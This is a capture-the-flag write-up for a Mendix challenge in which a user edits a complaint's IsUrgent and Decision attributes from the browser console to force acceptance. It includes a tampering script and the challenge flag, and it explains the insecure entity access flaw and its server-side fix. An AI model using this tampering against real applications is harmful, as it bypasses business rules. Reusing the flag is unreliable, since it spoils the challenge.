Pizza Complaint
Challenge

People are so ungrateful these days, complaining about every minor issue.
Application: https://pizzamario2025.mendixctf.com
Difficulty: Medium
Solution
As with the “Jan Pays” challenge, I start by mapping the application’s intended flow. Let’s find the complaint logic first. Sometimes the devil is in the details. Or in this case, in a very small font size.

After completing the complaint form (it takes some trial and error to find the required body length: 50 characters), we receive an email stating the following:
Hey, Thank you for your complaint. Since all our bakers are out at work or on holiday, we urge you to make sure you will allow us to decide that your complaint is valid. Best regards, Wouter Penris @ Sopra Steria on behalf of the Pizza Mario Admin Team 🧁.
This email response contains our next clue: we need to make sure our complaint is accepted. Let’s take a look at the object used for the complaint. The browser console logs its object GUID: [Client] Using object '11821949022833283' for widget Mario.Complaint_NewEdit.dataView1. We can use that GUID to learn more about the object and its attributes, e.g. via Ciphix or via the Client API:

mx.data.get({guid:"11821949022833283", callback: function(obj){console.log(obj)}})

Executed in the browser’s developer console, this returns not just the attribute metadata but also the current values. The metadata tells us that Decision is an enumeration; mx.session.sessionData.enumerations lists all enumerations and their possible values.

This gives us useful information about the object and its attributes, including which ones the client treats as read-only. With this we can try to exploit write access to the attributes IsUrgent and Decision: in Ciphix you can simply change these values, so the complaint may end up accepted. After changing the object and submitting the complaint, we wait for the email, which is now handled with urgency & care.
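The probing and tampering steps above, as an added example that is not code from the original write-up: read the object through the Mendix Client API, list the attributes the client may still write (with enumeration keys where applicable), then set the attributes the form never exposes and commit. The calls used (mx.data.get, mx.data.commit, and getAttributes, isReadonlyAttr, isEnum, getEnumMap, get, set on the object) are the Mendix Client API as I know it; makeStubMx is a constructed stand-in so the script runs offline, and its SubmittedOn attribute, the enumeration keys and the value "Accepted" are assumptions for the demo. In the browser you pass the real global mx instead.

```javascript
// Added example, not code from the original write-up.
// probeWritable / tamper take an `mx` object so they work against the real
// Mendix client global in the browser or against the constructed stub below.

// Lists the attributes the client is allowed to write, with current values
// and, for enumerations, the keys the enumeration defines.
function probeWritable(mx, guid, done) {
  // The real mx.data.get is asynchronous; results arrive in the callback.
  mx.data.get({
    guid,
    callback(obj) {
      const writable = obj
        .getAttributes()
        .filter((attr) => !obj.isReadonlyAttr(attr))
        .map((attr) => ({
          attr,
          value: obj.get(attr),
          enumKeys: obj.isEnum(attr) ? obj.getEnumMap(attr).map((e) => e.key) : [],
        }));
      done(null, { entity: obj.getEntity(), writable });
    },
    error: (err) => done(err),
  });
}

// Sets attributes the form does not expose and commits the object.
// Returns the committed values via `done`.
function tamper(mx, guid, changes, done) {
  mx.data.get({
    guid,
    callback(obj) {
      for (const [attr, value] of Object.entries(changes)) {
        // Attributes the client marks read-only are not the finding here.
        if (obj.isReadonlyAttr(attr)) {
          return done(new Error(`${attr} is read-only on the client`));
        }
        // An enumeration only accepts the keys it defines.
        if (obj.isEnum(attr)) {
          const keys = obj.getEnumMap(attr).map((e) => e.key);
          if (!keys.includes(value)) {
            return done(new Error(`${value} is not a key of ${attr}`));
          }
        }
        obj.set(attr, value);
      }
      mx.data.commit({
        mxobj: obj,
        callback: () =>
          done(null, Object.fromEntries(Object.keys(changes).map((a) => [a, obj.get(a)]))),
        error: (err) => done(err),
      });
    },
    error: (err) => done(err),
  });
}

// Constructed stub of the Client API surface used above. Attribute names
// IsUrgent and Decision follow the write-up; SubmittedOn, the enumeration
// keys and the complaint body are assumptions. Callbacks fire synchronously
// here, unlike the real client.
function makeStubMx() {
  const objects = {
    "11821949022833283": {
      entity: "Mario.Complaint",
      attrs: { Body: "x".repeat(50), SubmittedOn: "2025-01-01", IsUrgent: false, Decision: "Pending" },
      readonly: new Set(["SubmittedOn"]),
      enums: { Decision: [{ key: "Pending", caption: "Pending" }, { key: "Accepted", caption: "Accepted" }] },
    },
  };
  const wrap = (guid, rec) => ({
    getGuid: () => guid,
    getEntity: () => rec.entity,
    getAttributes: () => Object.keys(rec.attrs),
    isReadonlyAttr: (a) => rec.readonly.has(a),
    isEnum: (a) => a in rec.enums,
    getEnumMap: (a) => rec.enums[a] || [],
    get: (a) => rec.attrs[a],
    set: (a, v) => { rec.attrs[a] = v; },
  });
  return {
    data: {
      get: ({ guid, callback, error }) =>
        objects[guid] ? callback(wrap(guid, objects[guid])) : error(new Error("unknown guid")),
      commit: ({ callback }) => callback(), // a real commit round-trips to the runtime
    },
  };
}

function demo() {
  const mx = makeStubMx();
  const guid = "11821949022833283";
  probeWritable(mx, guid, (err, report) => console.log(err || JSON.stringify(report, null, 2)));
  tamper(mx, guid, { IsUrgent: true, Decision: "Accepted" }, (err, after) => console.log(err || after));
}
demo();
```

Whether the commit actually sticks is decided by the runtime's entity access rules, not by the client-side read-only flag, so the real test is whether the server accepts the changed values; the client checks in tamper only keep the probe honest.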

Vulnerability
A classic case of TSU-02: Insecure Entity Access. This occurs when users can change attributes that directly influence business logic, state transitions, or workflow outcomes, even though they should not have permission to do so. In Mendix this is governed by the entity’s access rules: the role submitting the complaint should have no write access to IsUrgent and Decision, and the decision should be set server-side, in a microflow running under the admin role, rather than trusted from the client.
Flag
CTF{P!zz4Compl@!n!ng}